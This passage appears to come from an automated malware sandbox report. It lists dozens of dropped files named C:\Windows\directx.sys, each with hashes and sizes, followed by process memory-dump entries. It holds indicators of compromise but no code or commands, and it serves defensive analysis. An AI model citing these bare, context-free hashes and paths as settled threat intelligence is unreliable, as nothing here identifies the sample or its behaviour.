c5bf345e8e11cd6fdbcb60643ebd6cbccb2d8b73

SHA256
fa56835ad7a732abf73929c11bcac97e1b09255852aa34866de06f73f74477d9

SHA512
27dd08d226c300f02bbadc774df82e3d4d1bad8327b728544f2bb8d9304a34bfc9879be4f7d4e7fae6697014f9fdc9c3124d1016d2b6bd7d98146ca9d74834da

Download Submit
C:\Windows\directx.sys

Filesize
223B

MD5
0420a6c42c03f789d7bc52e9d818df15

SHA1
aba0509b7e00e53b2aee9dd5a80bac342dcc3447

SHA256
fbb98b7148d9b0f70e1c4b299b0e1e2f6fcf4e5d269b71d2e5d1b91d3690e33d

SHA512
41e75968acb702ffe4dd1bd37ad1277e79c9c10ad47743d94d95a10648fd94a6ef245a462123d13b9a9b1fbea321d909bfe2a6e3afa0a0c2d64a72239b3d1cc2

Download Submit
C:\Windows\directx.sys

Filesize
228B

MD5
443483c4350081a0aef75e71ef1ab939

SHA1
bfc5a429524f79144924d0158c783e1eb329bb45

SHA256
067cca93d53bde6d4f4ca5bf3b61d8ef05473fb8bd6543704d18c3c3e920da79

SHA512
9a69a9fb354115281a42f57685756fdb24acdb97bf6cadb298178af877c13b8db906e4e1caa2c8459e30b3ab13f882343e84ede98762b168c5c103c8b52faaa8

Download Submit
C:\Windows\directx.sys

Filesize
105B

MD5
af55f9b7a4f85030bb938fe6026cc92b

SHA1
ab7538ee487e915cc756855702903f54a449488d

SHA256
2847805fa9cab52282540d843df8f70407cf3427323b67c5b2feb18a4275b59d

SHA512
3aa2022d1bb143507a974b2522ed978b159068add9de0f4763b07a9288ad8718ac2a02a860b161c32b1e99a75337c632a3ae3d2a3bd43e6c6dd40ca2fc6a704d

Download Submit
C:\Windows\directx.sys

Filesize
227B

MD5
b2ec4687469396c10adabd3634021e80

SHA1
0b75068f8f372157cc7037b0a1ae4f3f4976c2c3

SHA256
cb20b12aec2a4925ae46173e353df255c2a20581be9ba4d35e4c99419c40e179

SHA512
69174d6b03dddd415d9a6008cc4b336edf4e066cd29c4ba00e73c45e50b11a01f52618e0767d8c8195dca0ab92d4324f938966ee0fb9b45f21b3f727686126e5

Download Submit
C:\Windows\directx.sys

Filesize
76B

MD5
033a21d049cf5546fe0537f15435c440

SHA1
2da12b487030fb6300e992b474860444229dfad6

SHA256
bdb8157f9c7d593b90df878e8010f87c3d3f18108e43d2e50415b36c5536f3d1

SHA512
0a60df9963d3b5adb25347d1270163d7257dd0823a4435a7a07a3a0dfdeeef6e9b06d1101f672453b5cdc63bdbc18d4fd43e813fc6220a5c764a276190bcc224

Download Submit
C:\Windows\directx.sys

Filesize
227B

MD5
8eb798f535d0f1b8bae29f9449df9758

SHA1
1075773da24f5c9e1f458774268285656ea77474

SHA256
7060bc42635d3f3b7e41740e44df22d4c70491da8774eb84f954f369a2a9acaf

SHA512
4d0c7746d5a9a3ded212163f44721d599167bee9511f9687e4ca9bb25eaa0a568d05644fe72b087bed718808fdd6b9368eaa1dac614be1afbe681dd70bdb0a1f

Download Submit
C:\Windows\directx.sys

Filesize
102B

MD5
1b7253a3ba04b295e0751e9dd7ae460e

SHA1
58dd0463c24e0b76ec7ebb8fd52807e5417b9d10

SHA256
90730be4eb6834c6d3fc551ebf9f1051f3094eab17ffdfff7aede6360fbd2bab

SHA512
3a997b31b9bbc9c95e566a1af4d701a66745bd92d89c4a72b150b1fb455f9d103b7c2c57285bc5a945b9919742c75ebe55469271890d468c3f958e437442f7b0

Download Submit
C:\Windows\directx.sys

Filesize
227B

MD5
d5bcded1a6be90b346e69e64d1644c23

SHA1
01cd9f35574925c73e954e07db66335f5ab9bbf2

SHA256
b7d7721d2f10854d049cae79ffbb9fbccf6c7f670466f56ec905cce4ca0c8c47

SHA512
e111e4134f643cb83ac0c152a8574cddcf24219b7b83f11090c6452f6ac8d86c56ad26ba21d641893e31550124b63625e20178d0d537571971c7501ae18b98a6

Download Submit
C:\Windows\directx.sys

Filesize
220B

MD5
bbcf34b0480d608c38d3867acc864c76

SHA1
62ffac354909e84ad71e0ee2cd8381317adec9ef

SHA256
846e9e64273beff2dcae5d6344d4055b47ad411c520e75fe4dd55bdbb3d39ddb

SHA512
c6cd33bae1467e510f48eadfbef1e130e7a324a9a33154c3cb60e4d9c88d94ca5541b4e47ffa4653c37ae0008d465d172b63dcb7e66049af3e88134dccbdfe92

Download Submit
C:\Windows\directx.sys

Filesize
103B

MD5
5ba8aaed424d2ea14207c08853178df4

SHA1
40dd022e52533a8df90f6dedf1f3da167251da32

SHA256
9862747f46531821a827bf4eacd5757bd725929d6b24a09813fcc8b0f665f64b

SHA512
bfb8bed74a108e20897f2bb5593c95928166a42ff3bc2f61b39ef7e7e937e161f7547372f2718414db5c0b39636ca95d7151e8d967b6875fa4ed99eb00841aa1

Download Submit
C:\Windows\directx.sys

Filesize
104B

MD5
aa1fb9625b7941c3fef595101e7c9632

SHA1
c3100b7cff95853d5eebb4a34180635051aa164c

SHA256
a64fe85daebc19c5ee145a6f14d7cb31128458fe953e47ba017bd689b3916780

SHA512
a2d78c3ac4e4fb3399b13acab790688b29c181aacf067be1eada10aae35ac8d34e980f5fb665706421e9cbbdbc3abfdabc05dd8b31956cc4218c61161baab272

Download Submit
C:\Windows\directx.sys

Filesize
229B

MD5
081a505a0fe1a7ab5cc08a724b4c2151

SHA1
631220d03aea0c440d9720fc46090eee06fe8582

SHA256
c17467ff301a7b7588a09138082834c845eae691b2f9f385b51a6ebae952d4ab

SHA512
5afcc0284cc88f0b782d5e030fd0ab3edbba9b8750dfef5eefcc11c05fd33add59743103d12c387bd1e27f7023079a42859e1861b5beb2e3d4851f41d9ec5f73

Download Submit
C:\Windows\directx.sys

Filesize
24B

MD5
c93ff55f5c5a9e2323b2f5d677bdbee1

SHA1
3e1c36c7d34bafad15e140ce5b03734f6aa87d1d

SHA256
15a9b8e44230a9fef940f579e061c1db4244d2aae8a68f6139227b034e9f28cc

SHA512
8912432056d997f4847afcebbe0dca43e3d8bc249d539ebf937ab77871d797d6f84ff860fbccec6bffab898bf18edb30ea5805e8ed8c63e05a3272b0e512aa3a

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
5cf1b8fd9695abc0e0f1d65be2ceb02f

SHA1
e95113e3f639a0405479fe2a6d2b901e1b1b40bd

SHA256
1291aa0bc731a910739bdd5c03413382cdfcb6019e24a07b4e20bd96cbf9d11e

SHA512
8568feb60819f4d2ccdccf7163c2e36950d7669a81ed30ad836d392ff35d6fd4146a380a15cbe1508fda1c93d993578336011605ade23f2e79d810e977679297

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
da02225c1049ee7c98f0f3fb5a83f4d6

SHA1
dacffcabf8204ba73f89cc7e5f4e2fbdb21dad4b

SHA256
9d97a99f8debf405d7c50936676065937ca0666c422af570d19a1f1be52231bb

SHA512
65bc403194956927678586982484712f66fde6b7ad42b42b33a03396ec6e08ff8e71a10659a87040923092812c51f475ac01460f9947bed2df25f473e45ca68b

Download Submit
C:\Windows\directx.sys

Filesize
29B

MD5
e48dd15c2622de57f9d96167526aa29b

SHA1
227e44c82be64d3b54a0d237018a874ea16c6982

SHA256
b84d90ce79f74578bf032d5481e92435bb92dc5da421f090dacf3184478d0e60

SHA512
371d73f5ebbb28aa7ff462905c6176f35c817dc18bed35d06b6e68022c6887b871fcf655fd0190523ebf3a16818c8df3bb6479fb27aef2175fa0894105ec0aa0

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
22f1d79317030a3b5689cf7856b32391

SHA1
3d1792443840ff5b8a7f73ef7b3aa6737692d4f6

SHA256
6cf7c839ea80a8b871809b26a81a2c4bdb375ebae70df2ec69fa3cfac337d2cf

SHA512
211766a2030e0d80e5b3ed747c857a6172e3f111d5f34fee09488a7d59427ac9830c817fbed629ee6e0427a20fa198fb513270746924222a56fc1103b799cdfe

Download Submit
C:\Windows\directx.sys

Filesize
79B

MD5
83373443ca39a9e636b91094b1a1a9b9

SHA1
a86887ce2dadb5ade51911e73619877b5886b190

SHA256
1733affc9ca849bf357ca80a053ea7d770165a343a97109240b2cd6ece0eadab

SHA512
f9bb4a7a122cf084228add1a3955707856f4a82f5abd5429e859d3a79ecd4e3fae90b697b6a0deaa692a5f5c6a776612428dc3d134cd53e307e92866299187ff

Download Submit
C:\Windows\directx.sys

Filesize
79B

MD5
d03df9e90a2672d48764efd94a8978a6

SHA1
61f0269d74719a8c0f2f8508e748df65f7a9e9dc

SHA256
11475fa8b711d377308ea0a912f657d9a6457f9898de7d61851da3a5281bb297

SHA512
d523a54d162045b41414c64a00b4f2be80b6629e75f663d2772cc8e3b5b39b26350c509aa7c18a5477379e769eec46f62002492deb0baa5e6610055a86732665

Download Submit
C:\Windows\directx.sys

Filesize
56B

MD5
5b1000a7b605d406e3f72f0a88532dbb

SHA1
67d50b53e3000e35633a6aaad1ae4fc2af12c3f4

SHA256
81acf14c6df1734c06c401c2aa7b68474da975c089a351c8d637196c88b00e47

SHA512
579e8fb90744367e36ac2ec27abaf9ee91c6ebfcb5c2a1d971881a133a3fdd7d3bf4daed076edb041fbab42e053eb360d2ecddacc2544553e9a0b9128184bb50

Download Submit
C:\Windows\directx.sys

Filesize
58B

MD5
d464ee49f696cebef9c3ee575cd9537f

SHA1
6290ec1047c65beeab43dfcabeaf8f9c94c46c0f

SHA256
1f8a21907ce4244a06b215814c21c705a9d17ffe206af2f99184551d9c542a45

SHA512
bd3e7e9bee128a6dc51b84953b49f91ac8ee8daabfca6e69ad4d06fc5050b86970dd9a185998741915e81a3029d5dc155fd095d8701279733121f6e38ebc4953

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
c0f858b76631015652c4869ad8431c21

SHA1
f49b87df04b675bdd4f4f8d434cd8ecbc2515495

SHA256
4401045cc7a9f34ed57956ee15fc81b0edcb19ca55dc3721a928e5b1c63859c2

SHA512
a7d2c4b4ef7ba087cd12baa7901f77c6f6a54ceeba177558bcdecb1ad1eedf462b4eda3f6313b4b571df896cc2e3ca47b42cd2c2c7b125b527192f4feb579392

Download Submit
C:\Windows\directx.sys

Filesize
59B

MD5
ff83d88d9f8f6fe56c954eb99b012b31

SHA1
bed143dbdab4eb93f71a9f97881b7a223aa4733a

SHA256
c21bdb9fc584bc638528fa28bc37f2e2e95f3006707fb428e2ad0c5b877cdce3

SHA512
861a627080052a7d24bd8d98700189d683c4fa986bc5d4b0f77bfe27b1cc0238ebbe342fc6b08667730445307a7a85cbbf3d9f65f3c86d314730ecd9da8a054c

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
1a72b75486de9dbc7199f3db978e8e1e

SHA1
5dc1553d9e7a23926ba5498fadbb8810c033eb83

SHA256
78e8a2cffd89577ccbc4c8a8370b7b44dcafbc266301b11b30443314752c9a80

SHA512
82252500af20bd473207fe3b534c26496eb5b5ceeb462c6ad6ecef061ee8e34c5eb0639b868069c5f43d6e769c3e23ba35ed50b6fd20017427634a574add57a3

Download Submit
C:\Windows\directx.sys

Filesize
60B

MD5
342fe67b760a310cc22f6075f9ae09dd

SHA1
5f19eb961f26d20380fa78658795a57eea8cbf55

SHA256
04eedd08b3ff864efdeed3deaf8d409b2368e1768b88fe7db738f0e04564ceb1

SHA512
dfbd8416411ae6890f8d0b0f631463999523a3b8a28d6539706768f7d6dc9d15034530b4611cd6710beb729f4c765238a39d6f14eae39cfb692270356235dd39

Download Submit
C:\Windows\directx.sys

Filesize
55B

MD5
ae85c094a22411ece4f72cd60999f043

SHA1
63f560f4c4e0f8823e83ace1f5222f7b41fcd574

SHA256
dffc54ba7c8e5e2005047e4b1fdc8d037123d93e8fbf4d45c3849b09bfc29cf7

SHA512
d2a1f36cb96be9ca83476c43cd483887ceea9ac7f9e3ab066b4e359406540899e6f0ff44ab30b9bcb2d007c89fc34096e7332f6118619e86303746b19379bd41

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
c0b10143454d77739a368e04e0f35df5

SHA1
f3af68a474210444d81d85902d20e1b358dee3cf

SHA256
2917e6960136a725e02b583e48084f2d01e6f067b0e0c48a903cb9e87cbcc084

SHA512
d7a195e2a204bb8735770e8b69ecaadd209b59f0f80548f19294301cc11b7f4e8b818d0fe4075faed3cc6012654afb0447057867bb4d2e96311bc9474ed6c01b

Download Submit
C:\Windows\directx.sys

Filesize
59B

MD5
90b63a4461253b2d14168bcf857cf188

SHA1
082998baa31fd9af448efd19799f9415f8d8be17

SHA256
96732f4969cbc6b27f2e66c6445722e6dcabaa086fdb73523f833ced5c89ba80

SHA512
c09b452d866ae7468af54b38b566ac76df4c0f186f15342832a52139dc7ab857e10a078e6250b1b1983f935f23ca231b6a9edf4e67eea7d80f2c39a2f93b8f8c

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
bbecbb19459566310aa678454d30a600

SHA1
814caaac1fe203e50e9a8400881b5726afeb15ab

SHA256
e6d6dc7990194708bb53411f198f92642837396ce0fec7d750952868ec2c8e9a

SHA512
8610e8ea7d0dc81df088709ab095a83f9ae65cd18f7ec5405bb86bae4aee54ba44607c94d4118c36347f3d4b49873f636198274ed910d0513d53359eed862da0

Download Submit
C:\Windows\directx.sys

Filesize
57B

MD5
86a675fc399950cc3dd440783e4b25cd

SHA1
28c490a88e7d4a0bfce3b32963431e7fad65efb1

SHA256
25e0800bef5a527f4a36e7a002657d43b6182d2838109e9898ba1cb00b08d30b

SHA512
f33de80620949d432fb9375ddbe6e1ebb2e15912467fd816c0dd90ee0e744abbfbd4cc1a0231ab6f0ef30f696995c1d9c68c9e85b1f43f13cbc2d78067c32b29

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
301a985ec9414ad698c106e382c7eca7

SHA1
de378c75f032742080d4f01327fa65426cdcc9dc

SHA256
2e30c85bf6b1b647f8aa13051b976ac0995bcb37674df617ae803ec0241af911

SHA512
51d37a68b23b861cafa62cec418e10dcec411a57e5898664039c8f7d0d4793287397564775628f1c34f6166ed1eb4765328a87da50d5b5992fc1269533f23bf8

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
8c848316a6261bd825f8ab0a7eb87176

SHA1
0b17cfd10a7aef70d84b1e498efcf772016edf78

SHA256
faf1f19d7977966d4a05ca59ef16de768040bcc66f68061e74511eeaf34bd1bf

SHA512
eacb95b24a5b27b7e35f1738a3b4ad1373127f88faa1bc9f7fab921e56732c0006a6a78d9b1649fa971d3fe8379b5b4715a7517738bae1e829e4826cc2a4b0cc

Download Submit
C:\Windows\directx.sys

Filesize
59B

MD5
76b76d5598beffef2572283e1e366b49

SHA1
a55e7b642da70c09b7fcb06fb853ece330aafbbd

SHA256
bb330bc80520f8bdc4bb94f3a5a2076691e5db327aaa5aa49f9e8009fb9279f0

SHA512
ee221129e0b8b2895253026009c3ff8540570934a95f87b62039cfe5944b21eab288be3168af080ec6e06d7468d47801f129d39f97052e3119166372dc91d5ee

Download Submit
C:\Windows\directx.sys

Filesize
57B

MD5
56c38fa8be9835abd11c88289022993f

SHA1
fee23c06e6bade654ca908ecbddf7f5078abfddf

SHA256
373addc81477c4554955498da786fcd668b82dea4cddcb723790631e0fd6db84

SHA512
d9c9982a6a3e90d0578e86dbd06c544ae9a96883af6ad6f435558dadd20590567847a4337fa09999f5f08c2a819d21ea7ec997cc3f665f258bfb3c0e2ff8aacc

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
84e021af51e61ce7c835a45def1c6660

SHA1
ebb0f0ab2b6e6e6c49e57752d40bbae2a400119a

SHA256
99ef7621c8c8962b7d2fe77886599ded01041162e77e272797036aa316e31bee

SHA512
25b10fe8cea424ea8ad1c5d07bd4542db84e9e823f3ebf0b47326e71f118e2092ec5d5a912af1c1cb12524d27e37205685b8ac9601d8f139e06e734cb39de61d

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
ec2e63e9b2d1f269dfd8ede01f9fd253

SHA1
f1ca704b1da09a0460851acb10dd75e07272f147

SHA256
82f2c066c821ccba2ae33bfff447f70208a041f3140e563a3e0eaecdafc380c5

SHA512
7d69d1a247cf70ade7ed0af4b8514e4df9d145ef35339295e53957893bafc8443a41e8b467bd655fa316a8c019611474525763816ac7aa6617e5d79c0891b888

Download Submit
C:\Windows\directx.sys

Filesize
59B

MD5
2de58d7ce627bb0be1c0b0c435adfe32

SHA1
089f39bf86758a965dae79a0d3c664f2affbbd4e

SHA256
ec8634edb11be9ac2335c474920df87a90fe820705db05774492d1bf69171dce

SHA512
c77140a69029589058108c681259689855792eabc19203ce48ac450b8844f8a715e891589291ee67e942c42b3b611d6a5ed06ca6a0f31e80f66ffa4e15d26cf9

Download Submit
C:\Windows\directx.sys

Filesize
61B

MD5
40ade52684c6162b16bdd2a456b5595c

SHA1
96eaa512c9a0daf9a24c630ad8090bf2673f8f60

SHA256
6df46519d2c950782c01a68d82b72cb6738797115954a2f4179c6635379492f5

SHA512
74cbd9ccecba6fff3037d2e86a4ef9de55b4c6fa210a103ed44f217bd92fd432c6808eb36821e15dff9deef12111b1e2f6f0552978e0db8ea7fbd70fd373e2e5

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
5c98e061205aeac7c335169c19bca66b

SHA1
7ecbbe63db8c08f307192fee3430c2b7a303a712

SHA256
97e06c20cc50df29ff4a52df3f8124714fd4a34b3997032a6e407c0f992c9404

SHA512
dade047a4527d111de52381dd863129e8b0f614e1b69866789be91a4c6420015c4a0890ec0848d949bb0c1bf9eb34664114d5ee6b8bcf025c882a1bcd54d1ea0

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
643793908f394c0cd78ce9b38e2493c4

SHA1
e574234b00adb32895564cce5c86c11c783c2218

SHA256
568d904c74d20315f79144ad3dcda227be6393611766ed7d4c58b6a061d1de46

SHA512
c766cc0265e19c43240cf843f80a1ff35cb3dea66afe1d14c4dfcd4c09227b53466c33e7c0d7f988305376f185b271ff586d3d92d3284a0153faa62736f569f5

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
59b288cd02ac5770d9a4cd06ca3cebde

SHA1
629839b6ce9ba709c6eda58f71bac9fb262cbf6b

SHA256
cff9590fd3aedf442ea99587c813720f181a9988cd9a187f453d3a834cf6abdb

SHA512
9fd432a1d4232c24c1c59c1a6708eeac802f9272a32fa0a1b9022fe2c5c2aa222fb5a7faaaeeddfc9d7ae52e065f9bf1bb5667bc67614366dc44e965a0fcb85f

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
59b6978f3b1754075c5a49ac860c5b88

SHA1
c477c3fa38ac7a0aa3f935068cff944fc1895589

SHA256
8526820c9eb9ccc9b216899ad667cabfbdce3133e87898082fbbfea781bed975

SHA512
0a9f90946ad10ed794c016f7873078be7a3827b86b00bbc4f9e64010f17ab3bc99a49915291ec53ef79c7e878fe2598cf35ba4360ca5af32567c6bbe14570918

Download Submit
C:\Windows\directx.sys

Filesize
63B

MD5
9c336e4a760730e345334daa1404597a

SHA1
0431585106e59698b30f22964f3d3b26af9950e3

SHA256
b214352030c8b437d1ef7c30b5179671e8c50ca20388124b77282ede5f44946d

SHA512
f735079dbc9e264173c56045abaf80b259be21267a00eecfb0284c58bb92dac3a7ff4c6e3931aa5e8155deb54a0eee60b2257346d0ffde95ea1d0e8ccef8c421

Download Submit
C:\Windows\directx.sys

Filesize
122B

MD5
7b3a47ba2f69d1250ef0b68b99c340e5

SHA1
cb0fc79b93b371a9765f21ca74b91c77023297d0

SHA256
9caeb3abbfe02db4b06b24d091e1349743e708580164780939135e6ebe2a8626

SHA512
eee0e7ff04d7d627e95697e360019fd344b5d9e5972ebefaaa489701d462a2ace131d6592bd7540d5a345ab58aae837498588f7759093bb4b06d06fd7120fc05

Download Submit
C:\Windows\directx.sys

Filesize
125B

MD5
d8afd016570ae65fcbe9cd3b21c797e4

SHA1
bcc3b774ef77de7c7a4dd3a2b5bee7cb5edaa0dc

SHA256
f5f0b989cbbb35474899e2d2a784852acab1c042e8645af79ee9a5ec13da4a61

SHA512
f4d6e68dea257556d539460120d1cb6d13637440cc6d61c5e8e198974c9307c58d323e513a02def27d25039fa0bc8f9a5ee9c007819fb857d412e7fad48f683b

Download Submit
C:\Windows\directx.sys

Filesize
123B

MD5
d235568277c4bb5ad100c66b2c0deeca

SHA1
6255b853312f04094181d92bb664ce79085ca598

SHA256
f49940df1504bc12fbdbb0e38808242fb4097e43c7ef43051b112e5f67f5fcc1

SHA512
50f49415ee06d5e168d1b35b4fe5ffaa808e3e01dc0f9577fdc8a7853829797bcc1e95801a977df76b4a7e8ffac4942fc64f0e32c82c3dcab2e0686577207d61

Download Submit
C:\Windows\directx.sys

Filesize
121B

MD5
365778e8f82e1f6fef0fe66e4e49707b

SHA1
520817a65eeb37f58a73953bf4f7903fe1ece8b4

SHA256
8f2b006df7ec9d99e52dfa1dd0200cc028930c68772e8c06578ef0a0230fc46c

SHA512
9cc740aa8addab7dcef53807196d1ac6b2f70781e876abfab11880ba5e7245b32ce44e5a914049142e30a0aca195f1e9589550d4d6bd9b17c147381064b7f155

Download Submit
C:\Windows\directx.sys

Filesize
125B

MD5
cdd0efd8fd1b56064a0821acf3e54b7c

SHA1
36ca8220f821e0e8cf89111fedb339067c595c29

SHA256
12c59b3734b2253bb49ca0cc058cb4d0c3c2532f8e2a535866e90d7e084b00be

SHA512
8e0fa337a70452b114527bfc1d79fa0b2e2365457bfdacc98ef8fc2ff20261fe0aeff034b5711898fe64e169bec8d44ef3e787bb7394595ab1b89bd32015455b

Download Submit
C:\Windows\directx.sys

Filesize
125B

MD5
51716b670b825fd4ff2ddbde1c2e8290

SHA1
edcf6ddab9246a7e011638b173fdec4b897671fb

SHA256
0fc73caa6e09a4c39ffec9d70bd8c9d7224244b88ab08634cd50f49403446f79

SHA512
cfba324c7f921bb82db6331fa6cb0ff2a5209f5796cd6e8123e787ea2461b70c01f9e47d0de2dcbd34a51e0ca757573f795c24a826bfd71a784532e4c183934c

Download Submit
C:\Windows\directx.sys

Filesize
125B

MD5
6ca7d3dbf9f8b0c4c7c119abe7ff2d6a

SHA1
11061d683885a96d2da30f3d7dd5933f5907ccf6

SHA256
d1bc8f62b0e141982fccd69e1b246d4fe5644fcfbe3e18da3bf21357f66bd20e

SHA512
009085303873e0bfa29a46e7ac07b995971c01c4feb611f70875a4229d0496c14ef3027e9b01ffa8a701f666001befc62af44cf501788e15fd2441ce5e7cd2a3

Download Submit
C:\Windows\directx.sys

Filesize
125B

MD5
75456fbe5429d2932d7e91eb42e7a1f2

SHA1
b4e4126d1ffae7a52b74bd3a8acbc49fa8773d6d

SHA256
59964108eb57aa154ee999442959abc9cc35661def8c910aa08b6cbc94dfb3ad

SHA512
b2f1434d6ccc5fafe2d7262b536a79787a285bdcb8524158bc1eabc18d4bf522b11c274a7dd0ccf935bc995ef780f1f80be1fbf28198e73f7a7ac39172561044

Download Submit
C:\Windows\directx.sys

Filesize
125B

MD5
7fb1c2f81dc256ea85fe96723a3c2c8f

SHA1
ee4d645d8c6d7dadd65dd0369af195934385652f

SHA256
c6347b6be0adf0e79a210d1b69fd93e68db48dd5eabf4075f60807ef818d5edd

SHA512
7af27cac82d21385c191c0486edb12177a5d4f88b8fe80152a2dd47f2a6b84480ed1ed80f6be9d5ddcbc73639e56bc6455a407fb019b75fb2ea6424f52b64c19

Download Submit
C:\Windows\directx.sys

Filesize
125B

MD5
440c9f39592e5bd68de9043305b8f5dd

SHA1
c9964bd96333a520e67df5a927899a761858c8e5

SHA256
9bb8398814324d755dc8a73223b0c12b2e83e1a50b98bdc013b982058066a8c6

SHA512
d3915e7f731b4ed132035ddc1fbf808acdff02a46eb40cfeb490424916f49b2bf8d3a413eb6c6e688c4dc74158d40a8bdb38932f9680103108a82af5bfce008b

Download Submit
C:\Windows\directx.sys

Filesize
127B

MD5
e8c64d0eba798cd7d445731efcb05727

SHA1
d303f8a82b1d02c58f9cd8f61c52ff7fce18d797

SHA256
d01da3b4285fc91554ef8c0e9c597e7a19abd21a044bbd6f498c4f0c2f4f23e3

SHA512
82cf7c329a65e81465d570d3c3cf61e1426fb55f64dd8c685d824bd198bbbdab5657557c307d20f55b3cebd0e6346f0b6bfc53f8862b77c24e8bccac8aecdebb

Download Submit
C:\Windows\directx.sys

Filesize
171B

MD5
e4de04144f2c42c6ec03c9c5f6f09c99

SHA1
9772d0c754b8236bcc0e21a6ac543b05139af12d

SHA256
6e049b2e82e22de6bcb48165a7ef18ae24ba5243edf7409d59cbed096e0396f0

SHA512
7c68c888a762674a934b3d8fd65e1a46b2a44f66d5d51fa39226d8d5f27cc108232026956cced4ff1c53c82a307779d313cee4760389565d698c3c7112e3170c

Download Submit
C:\Windows\directx.sys

Filesize
175B

MD5
2b07490d3266385e65653c49abeb1922

SHA1
801d4a99b2adc23de0c8e38b26ec8766bed3948f

SHA256
d8547f69953bc793749c4cd1b4bfc200a94d667bde8b360b4ac41ca467712927

SHA512
4dad26a72cf6c2246bfc95d277131c82c9ae346ba8e2f854bcda3c236d21714cbd1cb28a5e6c8f679fa2bc84fb377a90e69164d4cac117e44e9c064694416a1a

Download Submit
C:\Windows\directx.sys

Filesize
108B

MD5
905e2b6ddf82bd04b05ca8734cef1b6c

SHA1
1b606c5dcb5cf41bafe095cf039a4662809aac26

SHA256
a47ec6f89e89868ffcdb9a294b2c323082ba3e984ad443fa35c9f881e3cc2f32

SHA512
90299434f1a5c4c0dc8afa80b0a7e7e09ec25ff87415f0bfbde85fec9e566a06eb2a49112204f415370c356b5dcae79a6452fe1d9ed6bc5cdfcbf2c349fb59a9

Download Submit
C:\Windows\directx.sys

Filesize
112B

MD5
1624063aa19686a0551144702c102415

SHA1
b758b7069695414192a0b316dc3c56329a38264a

SHA256
5190f8cb9abbfa6bae0f9c88bf82bde1d363e028049e47e9fef26ce82ddb0fdc

SHA512
f2e584278d04c603e61791741222cb279df0c158eeeca61abccf98c704b958f40dc0bba4709b778db41bdf0a0ed36028c706420f1508352506e1cffa71f9d850

Download Submit
C:\Windows\directx.sys

Filesize
111B

MD5
b4a70b2f4c21f6f1be2a6f6db07c7c7c

SHA1
2148983acd0460501c9e443825da2ad82d4c83f6

SHA256
16b3b7fddf2598f1df9a4e70eda5dd816d0a66ac034aaf134d6307981da68f1e

SHA512
3db3f0d19330e4e79e403f428c9f740bb2378aa7ed730acc9c4fa2a03121b2345f58d1a802c7f81471878f5e09ab2b88f1a79e31837af33f9dafe33587a76d86

Download Submit
memory/488-1727-0x0000000000820000-0x0000000000821000-memory.dmp

Filesize
4KB

Download
memory/488-152-0x0000000000820000-0x0000000000821000-memory.dmp

Filesize
4KB

Download
memory/488-1721-0x0000000000400000-0x000000000068E000-memory.dmp

Filesize
2.6MB

Download
memory/712-1837-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/712-679-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/760-1149-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/760-107-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/764-608-0x0000021F15700000-0x0000021F15710000-memory.dmp

Filesize
64KB

Download
memory/764-650-0x0000021F127D0000-0x0000021F127D2000-memory.dmp

Filesize
8KB

Download
memory/764-592-0x0000021F15220000-0x0000021F15230000-memory.dmp

Filesize
64KB

Download
memory/792-1749-0x00007FFBEC900000-0x00007FFBEC9AE000-memory.dmp

Filesize
696KB

Download
memory/792-1739-0x00007FFBEE9F0000-0x00007FFBEEBCB000-memory.dmp

Filesize
1.9MB

Download
memory/792-1746-0x00007FFBEE9F0000-0x00007FFBEEBCB000-memory.dmp

Filesize
1.9MB

Download
memory/792-1745-0x00007FFBEE9F0000-0x00007FFBEEBCB000-memory.dmp

Filesize
1.9MB

Download
memory/792-1747-0x00007FFBEE9F0000-0x00007FFBEEBCB000-memory.dmp

Filesize
1.9MB

Download
memory/792-1741-0x00007FFBEE9F0000-0x00007FFBEEBCB000-memory.dmp

Filesize
1.9MB

Download
memory/792-1750-0x00007FFBAEA80000-0x00007FFBAEA90000-memory.dmp

Filesize
64KB

Download
memory/792-1742-0x00007FFBEE9F0000-0x00007FFBEEBCB000-memory.dmp

Filesize
1.9MB

Download
memory/960-1919-0x0000000000400000-0x000000000048D000-memory.dmp

Filesize
564KB

Download
memory/1376-698-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1532-1735-0x0000000001190000-0x00000000011A0000-memory.dmp

Filesize
64KB

Download
memory/1532-171-0x0000000001190000-0x00000000011A0000-memory.dmp

Filesize
64KB

Download
memory/1532-1751-0x0000000001190000-0x00000000011A0000-memory.dmp

Filesize
64KB

Download
memory/1532-402-0x0000000001190000-0x00000000011A0000-memory.dmp

Filesize
64KB

Download
memory/1532-190-0x0000000001190000-0x00000000011A0000-memory.dmp

Filesize
64KB

Download
memory/1532-172-0x000000006E350000-0x000000006E900000-memory.dmp

Filesize
5.7MB

Download
memory/1532-1824-0x0000000001190000-0x00000000011A0000-memory.dmp

Filesize
64KB

Download
memory/1532-169-0x000000006E350000-0x000000006E900000-memory.dmp

Filesize
5.7MB

Download
memory/1532-1731-0x000000006E350000-0x000000006E900000-memory.dmp

Filesize
5.7MB

Download
memory/2852-1715-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2996-918-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2996-782-0x0000000000540000-0x0000000000541000-memory.dmp

Filesize
4KB

Download
memory/3592-1067-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/3592-91-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/3728-1723-0x0000000000400000-0x0000000000705000-memory.dmp

Filesize
3.0MB

Download
memory/3728-167-0x0000000000730000-0x0000000000731000-memory.dmp

